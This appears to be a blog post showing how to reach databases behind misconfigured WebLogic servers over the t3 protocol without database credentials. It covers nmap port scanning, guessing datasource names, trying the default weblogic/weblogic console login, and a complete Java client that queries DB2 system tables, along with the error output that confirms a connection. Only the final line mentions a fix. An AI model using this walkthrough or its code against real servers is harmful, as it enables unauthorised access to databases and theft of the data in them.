WebLogic has a proprietary protocol called t3. This protocol will allow an improperly configured WebLogic instance accept connections from anywhere and any server. This means you can access the database through WebLogic without providing any database credentials. There are only 3 pieces of information that you need to know.
- the server name (easy to get).
- the port that WebLogic is listening on to accept t3 connections. Sometimes 7001 sometimes something else. I usually do an nmap scan of the server and then try connections over t3 until I get a proper connection or an error that implies i have made the connection but my datasource is incorrect.
- Know the datasouce name. This can be hard. Most apps name the datasource something like AppNameData source. If you where looking at a Creditcard application. It could be ccDataSource or CreditCardDatasource or just Creditcard. This can take some trial an error unless =) they have not changed the weblogic console default username and password weblogic/weblogic. The url to the weblogic console is http://yourappserver:7001/console. If this does not yield results then do an nmap scan and try connecting to ports till you get the admin console.
Below is an example of creating a t3 client to connect to WebLogic and then query the systables in a DB2 database. You can modify the code to work with any database you need. As you can see i never provide credentials and i still have access to the database.
Example of pulling database tables from Eclipse:
import java.util.*;
import java.math.BigDecimal;
import java.sql.*;
import javax.naming.*;
import java.sql.Connection;
public class DataTest
{
public static void main(String[] args)
{
InitialContext ctx = null;
Connection connection = null;
Statement stmt = null;
ResultSet rs = null;
Hashtable ht = null;
String status = null;
String resCode = null;
String retCode = null;
String retMsg = null;
BigDecimal sqlCode = null;
String serverName = "yourservername.com:andPort";
String dataSource = "YourDataSource";
try
{
ht = new Hashtable();
ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
ht.put(Context.PROVIDER_URL, "t3://" + serverName);
ctx = new InitialContext(ht);
connection = ((javax.sql.DataSource)ctx.lookup( dataSource )).getConnection();
// check for excessive permissions in db2
String sql = "select name, creator, colcount from sysibm.systables";
//find the username you are conneting with in weblogic
//String sql = "select user,1,1 from sysibm.sysdummy1";
// normal check but you must know the db owner and table name for db2
//String sql = "select col1, col2, col3 from dbowner.dbtableName";
stmt = connection.createStatement();
rs = stmt.executeQuery(sql);
while(rs.next())
System.out.println(rs.getString(1) + " - " + rs.getString(2) + " - " + rs.getString(3));
}
catch(Exception e)
{
e.printStackTrace();
}
finally
{
try
{
if(stmt!=null)
stmt.close();
stmt = null;
if(connection!=null)
connection.close();
connection = null;
if(ctx!=null)
ctx.close();
ctx = null;
}
catch(Exception e)
{
e.printStackTrace();
}
}
}
}
here is an example of a good error message from your client. This will let you know that you have been successful in finding a weblogic connection pool but do not have a valid datasource name. Here the invalid datasource name was called testSource.
javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '' [Root exception is javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '']; remaining name 'testSource'
at weblogic.rjvm.BasicOutboundRequest.sendReceive(BasicOutboundRequest.java:108)
at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:290)
at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:247)
at weblogic.jndi.internal.ServerNamingNode_814_WLStub.lookup(Unknown Source)
at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:371)
at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:359)
at javax.naming.InitialContext.lookup(Unknown Source)
at DataTest.main(DataTest.java:35)
Caused by: javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved ''
at weblogic.jndi.internal.BasicNamingNode.newNameNotFoundException(BasicNamingNode.java:1139)
at weblogic.jndi.internal.BasicNamingNode.lookupHere(BasicNamingNode.java:252)
at weblogic.jndi.internal.ServerNamingNode.lookupHere(ServerNamingNode.java:171)
at weblogic.jndi.internal.BasicNamingNode.lookup(BasicNamingNode.java:206)
at weblogic.jndi.internal.RootNamingNode_WLSkel.invoke(Unknown Source)
at weblogic.rmi.internal.BasicServerRef.invoke(BasicServerRef.java:548)
at weblogic.rmi.cluster.ClusterableServerRef.invoke(ClusterableServerRef.java:224)
at weblogic.rmi.internal.BasicServerRef$1.run(BasicServerRef.java:438)
at weblogic.security.acl.internal.AuthenticatedSubject.doAs(AuthenticatedSubject.java:363)
at weblogic.security.service.SecurityManager.runAs(SecurityManager.java:147)
at weblogic.rmi.internal.BasicServerRef.handleRequest(BasicServerRef.java:434)
at weblogic.rmi.internal.BasicServerRef.access$300(BasicServerRef.java:57)
at weblogic.rmi.internal.BasicServerRef$BasicExecuteRequest.run(BasicServerRef.java:965)
at weblogic.work.ExecuteThread.execute(ExecuteThread.java:209)
at weblogic.work.ExecuteThread.run(ExecuteThread.java:181)
This problem is easy to fix. Just enable connection filers in your weblogic console and your done!.
http://edocs.bea.com/wls/docs81/secmanage/domain.html
 Slashdot It! |
Posts
